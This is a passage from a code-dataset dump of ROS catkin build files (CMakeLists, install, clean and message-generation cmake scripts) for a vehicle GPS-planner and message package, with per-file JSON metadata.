"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(path)\n\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs nav_msgs geometry_msgs genmsg zf_msgs)\n## Find Eigen, for matrix operation\nfind_package (Eigen3 )\n## find_package (Eigen3 REQUIRED )\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(gps_planner src/gps_planner.cpp)\ntarget_link_libraries(gps_planner ${catkin_LIBRARIES} ${Boost_LIBRARIES} )\n#target_link_libraries(test_pos320 ${Boost_LIBRARIES} Eigen3::Eigen)\nadd_dependencies(gps_planner path_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
{
"alpha_fraction": 0.7449437975883484,
"alphanum_fraction": 0.7622472047805786,
"avg_line_length": 50.13793182373047,
"blob_id": "269db0ecb1d96bc3c09fe62704dc505ced931913",
"content_id": "c8998d2bb093b846e406825f9b794e449b2ae632",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 4450,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 87,
"path": "/build/zf_msgs/cmake_install.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs\n\n# Set the install prefix\nif(NOT DEFINED CMAKE_INSTALL_PREFIX)\n set(CMAKE_INSTALL_PREFIX \"/home/zf/xuechong_ws/zhuifengShow0919/install\")\nendif()\nstring(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nif(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n if(BUILD_TYPE)\n string(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n else()\n set(CMAKE_INSTALL_CONFIG_NAME \"\")\n endif()\n message(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nendif()\n\n# Set the component getting installed.\nif(NOT CMAKE_INSTALL_COMPONENT)\n if(COMPONENT)\n message(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n set(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n else()\n set(CMAKE_INSTALL_COMPONENT)\n endif()\nendif()\n\n# Install shared libraries without execute permission?\nif(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n set(CMAKE_INSTALL_SO_NO_EXE \"1\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/msg\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-paths.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/gennodejs/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs.pc\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-extras.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgsConfig.cmake\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgsConfig-version.cmake\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/package.xml\")\nendif()\n\n"
},
{
"alpha_fraction": 0.7507787942886353,
"alphanum_fraction": 0.7912772297859192,
"avg_line_length": 34.66666793823242,
"blob_id": "eea956d3cf97105e7ff9f419188acf94c8333618",
"content_id": "72bd26370f6114440e045623f276c03491cd859b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 9,
"path": "/build/pos320/CMakeFiles/pos320_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/pos320_generate_messages_eus\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/pos320/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/pos320_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.728863000869751,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 41.9375,
"blob_id": "75a702598e8c5cb88059b90af3ce021e86ae6dd9",
"content_id": "cbc5e231fe7f69ab21eb36af90bd1f4a105f02a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/build/zf_msgs/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"zf_msgs\")\nset(zf_msgs_VERSION \"1.8.0\")\nset(zf_msgs_MAINTAINER \"Xue Chong <[email protected]>\")\nset(zf_msgs_PACKAGE_FORMAT \"1\")\nset(zf_msgs_BUILD_DEPENDS \"message_generation\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_BUILD_EXPORT_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_BUILDTOOL_DEPENDS \"catkin\")\nset(zf_msgs_BUILDTOOL_EXPORT_DEPENDS )\nset(zf_msgs_EXEC_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_RUN_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_TEST_DEPENDS )\nset(zf_msgs_DOC_DEPENDS )\nset(zf_msgs_URL_WEBSITE \"\")\nset(zf_msgs_URL_BUGTRACKER \"\")\nset(zf_msgs_URL_REPOSITORY \"\")\nset(zf_msgs_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.7722152471542358,
"alphanum_fraction": 0.8022528290748596,
"avg_line_length": 56.07143020629883,
"blob_id": "86de7f81e7a3c08523ff26ba29900bba1c4af393",
"content_id": "07ce644f814ac5a644df32a03e89e6dd5df6d24c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_nodejs\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/BreakStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/SteerStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/ThrottleGearStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/MotionCmd.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/CanInfo.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/CanInfoAW.js\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_nodejs.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6530324220657349,
"alphanum_fraction": 0.7306064963340759,
"avg_line_length": 43.375,
"blob_id": "50bf0cf21eeeb39b3c9320f9b4ba68732c2b78e6",
"content_id": "b125d98cb35e189c48db2b232616280fe1933e76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 16,
"path": "/build/pos320/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"pos320\")\nset(pos320_VERSION \"0.1.0\")\nset(pos320_MAINTAINER \"Your Name <[email protected]>\")\nset(pos320_PACKAGE_FORMAT \"2\")\nset(pos320_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_BUILD_EXPORT_DEPENDS )\nset(pos320_BUILDTOOL_DEPENDS \"catkin\")\nset(pos320_BUILDTOOL_EXPORT_DEPENDS )\nset(pos320_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_TEST_DEPENDS )\nset(pos320_DOC_DEPENDS )\nset(pos320_URL_WEBSITE \"http://wiki.ros.org/pos320\")\nset(pos320_URL_BUGTRACKER \"\")\nset(pos320_URL_REPOSITORY \"\")\nset(pos320_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.7517962455749512,
"alphanum_fraction": 0.7642503380775452,
"avg_line_length": 39.40645217895508,
"blob_id": "7ac46d2a5f90d0193e50a7ed4c352373162e2c90",
"content_id": "b3131983b3bd542bb3091dd30494c987e0bc3d8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 12526,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 310,
"path": "/build/zf_msgs/cmake/zf_msgs-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"zf_msgs: 2 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Izf_msgs:/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg;-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/kinetic/share/geometry_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(zf_msgs_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_custom_target(_zf_msgs_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zf_msgs\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_custom_target(_zf_msgs_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zf_msgs\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" \"geometry_msgs/Pose2D:std_msgs/Header\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_cpp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_cpp _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_cpp _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_gencpp)\nadd_dependencies(zf_msgs_gencpp zf_msgs_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_eus(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_eus _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_eus _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_geneus)\nadd_dependencies(zf_msgs_geneus zf_msgs_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_lisp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_lisp _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_lisp _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_genlisp)\nadd_dependencies(zf_msgs_genlisp zf_msgs_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_nodejs(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_nodejs _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_nodejs _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_gennodejs)\nadd_dependencies(zf_msgs_gennodejs zf_msgs_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_py(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_py _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_py _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_genpy)\nadd_dependencies(zf_msgs_genpy zf_msgs_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(zf_msgs_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\nif(TARGET geometry_msgs_generate_messages_cpp)\n add_dependencies(zf_msgs_generate_messages_cpp geometry_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(zf_msgs_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\nif(TARGET geometry_msgs_generate_messages_eus)\n add_dependencies(zf_msgs_generate_messages_eus geometry_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(zf_msgs_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\nif(TARGET geometry_msgs_generate_messages_lisp)\n add_dependencies(zf_msgs_generate_messages_lisp geometry_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zf_msgs\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(zf_msgs_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\nif(TARGET geometry_msgs_generate_messages_nodejs)\n add_dependencies(zf_msgs_generate_messages_nodejs geometry_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zf_msgs\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(zf_msgs_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET geometry_msgs_generate_messages_py)\n add_dependencies(zf_msgs_generate_messages_py geometry_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.7298969030380249,
"alphanum_fraction": 0.7298969030380249,
"avg_line_length": 27.47058868408203,
"blob_id": "05524508b1d5654538cf6073b08aff88eb4e190e",
"content_id": "67f2f2b93d1fe8a670ba961d713bfe8d2a1e2953",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 485,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
